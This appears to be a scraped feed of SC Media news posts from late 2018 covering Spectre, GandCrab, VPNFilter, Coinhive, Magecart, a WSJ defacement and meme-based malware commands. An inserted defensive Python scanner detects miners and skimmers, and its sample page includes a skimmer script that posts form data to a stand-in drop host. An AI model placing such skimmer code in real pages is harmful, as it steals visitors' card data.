It was clear it was going to be an intense year for the cybersecurity industry when, just days after ringing in 2018, researchers announced a vulnerability found in essentially all CPU processors made over the previous two decades. From there, things only got busier, with news of Russian exploits, new ransomware families and much, much more.

Spectre and Meltdown: A mere three days into 2018, multiple groups of researchers publicly disclosed Spectre and Meltdown, a trio of CPU chip vulnerabilities representing an entirely new classification of bugs. Found in Intel, IBM, ARM and AMD chips powering an enormous spectrum of hardware products, these vulnerabilities were found to result from a flaw in the processor optimization functionality known as speculative execution. Researchers warned that the bugs could be exploited via side channel attack to access and steal sensitive information from devices by tricking programs into either leaking their secrets or accessing another application’s memory. Spectre and Meltdown’s public disclosure came after months of secretive, painstaking and unprecedented cross-industry collaboration to create patches and modifications, resulting in complex changes to many layers of the software stack. In some cases, these repairs regrettably slowed down the performance of affected processors. In the ensuing months, scientists found additional, new-generation variants of Spectre and Meltdown, as well as another family of speculative execution bugs called Foreshadow and Foreshadow-NG. In response to ongoing concerns, Intel said that its next-generation of chips would be designed with built-in defenses for Spectre-like attacks.

GandCrab: Debuting last January, the malicious cryptor GandCrab quickly became the breakthrough ransomware of 2018. In a departure from conventional ransomware tactics, GandCrab’s developers have chiefly relied on exploit kits such as RIG, GrandSoft and Fallout to distribute their malware. Typically, these kits are served up in malvertising campaigns. Adding to its quirkiness, GandCrab also demands payment using the cryptocurrency Dash, and its C2 servers are generally hosted on the Namecoin TLD domain .bit. GandCrab has so far evolved into five major versions; decryptors are available for several of them, including the original and versions four and five. Last October, Bitdefender estimated that GandCrab’s developers may have made at least $300 million in the prior couple of months, noting that the customized ransom demands ranged anywhere from $600 to $700,000. All things considered, it’s no wonder that GandCrab has left its victims feeling pretty crabby.

Dishonorable mention: SamSam ransomware, which ratcheted up its targeting of healthcare and government institutions this past year, including the city of Atlanta. An August report from Sophos estimated that SamSam has so far earned its creator roughly $6 million.

VPNFilter: A potentially destructive attack may have been averted after the stunning discovery of hundreds of thousands of global networking devices infected with VPNFilter, a modular malware program attributed to Russia’s Fancy Bear APT group. Secretly residing on a wide array of routers and Network Attached Storage devices since 2016, VPNFilter is capable of DDoS attacks, device bricking, data exfiltration and cyber espionage. Additional third-stage modules also help it more easily propagate from network devices to other endpoints, perform data filtering, and obfuscate or encrypt its malicious traffic. The first stage of VPNFilter, which establishes persistence, is unique among IoT malware in that it can survive a reboot. Infection levels were especially heavy in Ukraine, leading officials to suspect Russia could have been preparing to execute a large-scale attack against its neighbor. In May, the FBI announced that it had seized the domain linked to the VPNFilter botnet, recommending that network device owners reboot their devices to kill off any second- or third-stage malware. In July, Ukraine announced that a Russian attempt to attack a chlorine distillation plant using VPNFilter had been thwarted.

Coinhive: The value of Bitcoin and other popular digital currencies may be dropping of late, but the popularity of cryptominers among the cybercriminal community has steadily soared. King of the 2018 cryptojackers was Coinhive, thanks in part to its focus on Monero, an anonymous currency whose transactions are highly difficult to trace. Coinhive is offered as a legitimate service for website owners seeking a money-making alternative to advertisements, but that doesn’t stop malicious actors from secretly injecting its code into compromised sites in order to siphon processing power from their visitors. For example, a report published last May by security researcher Troy Mursch revealed one Coinhive campaign that compromised 391 Drupal sites, including those operated by the San Diego Zoo, Lenovo, UCLA, the National Labor Relations Board, the government of Chihuahua, Mexico and more.

Magecart: The e-commerce card-skimming malware threat collectively known as Magecart isn’t actually attributed to one single actor. There are at least six major groups plus additional smaller perpetrators that all use versions of the same toolset. In a typical case, the attacker secretly embeds compromised webpages with a JavaScript-based tool that copies data entered into online forms and sends it to a malicious drop server. While this threat dates as far back as 2014, two of the most recent groups to emerge vaulted Magecart to new heights of infamy in 2018, after conducting highly prominent and lucrative campaigns against major online players. A November 2018 research report from Flashpoint and RiskIQ refers to the most high-profile Magecart group as “Group 6,” noting that this actor appears to focus exclusively on top-tier targets – successfully breaching both British Airways and Newegg earlier this year. Meanwhile, a separate Magecart group has taken a different approach, compromising potentially thousands of companies at once by initially infecting their third-party service providers in a supply chain attack. It is this group that successfully breached Ticketmaster this year as part of a campaign targeting more than 800 e-commerce sites, RiskIQ reported.
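Both the Coinhive and Magecart entries above describe the same defender problem: a script that does not belong has been injected into a page, either to load a browser miner or to copy form input to a drop server. The following is an added example, not code from SC Media, Trend Micro, Flashpoint or RiskIQ, of a static page scan that flags both patterns. It parses the page's script tags and reports an external miner library, any script loaded from a host outside the site's allowlist, and inline scripts that both read form fields and send data to an off-site host. The sample page, the first-party allowlist (`shop.example`), the drop host (`drop.example.invalid`) and the miner script path are constructed for the example; `coinhive.com` is the service the article discusses.

```python
"""Static scan of a page's <script> tags for injected cryptominer loaders
and Magecart-style form skimmers.  Added example; the hosts, page and
heuristics below are assumptions, not anything from the article."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the site legitimately serves scripts from or posts data to (assumed).
FIRST_PARTY_HOSTS = {"shop.example", "cdn.shop.example"}
# Hosts that serve browser-mining libraries; coinhive.com is the service
# named in the article, the second entry is a constructed placeholder.
MINER_HOSTS = {"coinhive.com", "miner-pool.invalid"}

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
# Inline code that reads what the visitor typed into a form.
READS_FORMS = re.compile(r"\.value\b|new FormData\(|querySelectorAll\(\s*['\"]input")
# Inline code that can ship data to another host.
EXFIL_CALL = re.compile(r"\bfetch\(|XMLHttpRequest|sendBeacon\(|new Image\(\)")
# Inline use of a mining API (CoinHive.Anonymous etc. is assumed naming).
MINER_API = re.compile(r"\bCoinHive\.|\bcryptonight\b", re.IGNORECASE)


class ScriptCollector(HTMLParser):
    """Collects (src, inline_body) for every <script> element on the page."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._current = [dict(attrs).get("src"), ""]

    def handle_data(self, data):
        if self._current is not None:
            self._current[1] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(tuple(self._current))
            self._current = None


def scan_page(html, allowed_hosts=FIRST_PARTY_HOSTS):
    """Return findings as dicts with 'kind', 'host' and 'reason', in page order."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src, body in collector.scripts:
        if src:  # external script: judge it by where it is loaded from
            host = urlparse(src).hostname or ""
            if host in MINER_HOSTS:
                findings.append({"kind": "miner", "host": host,
                                 "reason": "external miner library loaded"})
            elif host and host not in allowed_hosts:
                findings.append({"kind": "unknown_third_party", "host": host,
                                 "reason": "script loaded from host outside allowlist"})
            continue
        if MINER_API.search(body):
            findings.append({"kind": "miner", "host": None,
                             "reason": "inline script invokes a mining API"})
        # Skimmer heuristic: reads form input AND sends it to a non-allowlisted host.
        if READS_FORMS.search(body) and EXFIL_CALL.search(body):
            for host in sorted(set(URL_RE.findall(body))):
                if host not in allowed_hosts:
                    findings.append({"kind": "skimmer", "host": host,
                                     "reason": "inline script reads form fields and sends data off-site"})
    return findings


# Constructed checkout page: one legitimate CDN script, one miner loader,
# one skimmer-like inline script and one benign first-party analytics call.
SAMPLE_HTML = """<html><body><form><input name="card"></form>
<script src="https://cdn.shop.example/checkout.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  document.querySelector('form').addEventListener('submit', function () {
    var fd = new FormData(document.querySelector('form'));
    fetch('https://drop.example.invalid/collect', {method: 'POST', body: fd});
  });
</script>
<script>
  fetch('https://shop.example/api/track', {method: 'POST', body: 'page=checkout'});
</script>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_HTML):
        print(f"{finding['kind']:>20}  {finding['host']}  {finding['reason']}")
```

Run against the constructed page, the scan reports the Coinhive loader as a miner and the inline submit handler as a skimmer posting to `drop.example.invalid`, while the first-party CDN script and the analytics call to `shop.example` pass. The heuristics are deliberately simple; in a real deployment the allowlist should come from the site's Content Security Policy, and the scan should be re-run on every deploy and on the third-party scripts the page pulls in, since the supply-chain variant described above injects the skimmer upstream of the site itself.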

The post 2018 – The year that was: Top Threats appeared first on SC Media.

Author: Bradley Barth

The Wall Street Journal was hacked and had a page defaced by the apparent fans of the online personality PewDiePie.

The defaced page contained sponsored content, but was altered to show an apology by the Journal to Felix Kjellberg who runs the PewDiePie YouTube channel. The page was taken down, but a copy has been stored on The Internet Archive.

The exact reason for the hack is not known, but The Verge noted the PewDiePie’s fans have had a running feud with the business newspaper since it ran an investigatory story into his YouTube channel. The Journal told The Verge it was aware of the attack and is investigating.

This is not the first time hackers have come out in support of Kjellberg. In late November a hacker forced thousands of internet-connected printers to spit out messages in support of Swedish video game commentator and YouTube star PewDiePie. The prankster said he (or she) was doing it to raise cybersecurity awareness, according to a BBC report, and claimed he could even cause physical damage to the printers by repeatedly writing data to their chips until they fry.

The post WSJ gets a slice of PewDiePie appeared first on SC Media.

Author: Doug Olenick

Researchers from Trend Micro have reported the discovery of two Twitter posts containing malicious memes that feature hidden code that acts like a command-and-control service for downloaded malware.

In a blog post published late last week, the researchers said the tweets were posted on Oct. 25 and 26, respectively, using a Twitter account created back in 2017. Abusing the meme this way is essentially a unique form of steganography, a technique used by malware developers to conceal malicious code inside images in order for it to go undetected.

In this case, the memes hid a “/print” command, which tells the malware to take screenshots of the infected machine and then exfiltrate images to an attacker-controlled server whose address is available via a hard-coded URL on

Trend Micro identifies the corresponding malware as TROJAN.MSIL.BERBOMTHUM.AA. Researcher and blog post author Aliakbar Zahravi said the threat is “notable because the malware’s commands are received via a legitimate service (which is also a popular social networking platform), employs the use of benign-looking yet malicious memes, and it cannot be taken down unless the malicious Twitter account is disabled.”

This malware supports other commands besides “/print,” including commands for capturing clipboard content, and collecting host machine information, including usernames, running processes and file names. It is not clear, however, what the method or vector is through which the malware infects its victims.

Twitter removed the offending account on Dec. 13, Trend Micro added. A screenshot provided by the cybersecurity company shows that one of the memes featured an image of Laurence Fishburne in The Matrix, with words that read: “WHAT IF I TOLD YOU THE RESOURCES ARE NOT REAL”. The user’s display name in the screenshot was “bomber”.

Twitter’s shares fell seven percent yesterday following the Trend Micro report, as well as a public disclosure from the social media giant that it was investigating unusual online support forum traffic that could have been the work of state-sponsored hackers.

The post That awkward moment when cybercriminals use memes to hide malicious code appeared first on SC Media.

Author: Bradley Barth

In the good old days, incinerating backup tapes or shredding a few hard drives would have solved the problem. Today, we have a bigger challenge.

Author: Kaan Onarlioglu Senior Security Researcher, Akamai

Devastating, targeted ransomware attacks didn’t start with SamSam and they didn’t end with it either.

Author: Mark Stockley

As Cryptocurrency Crash Continues, Will Mining Threat Follow?

Original Post from Talos Security Post authored by Nick Biasini. Executive Summary As 2018 draws to…
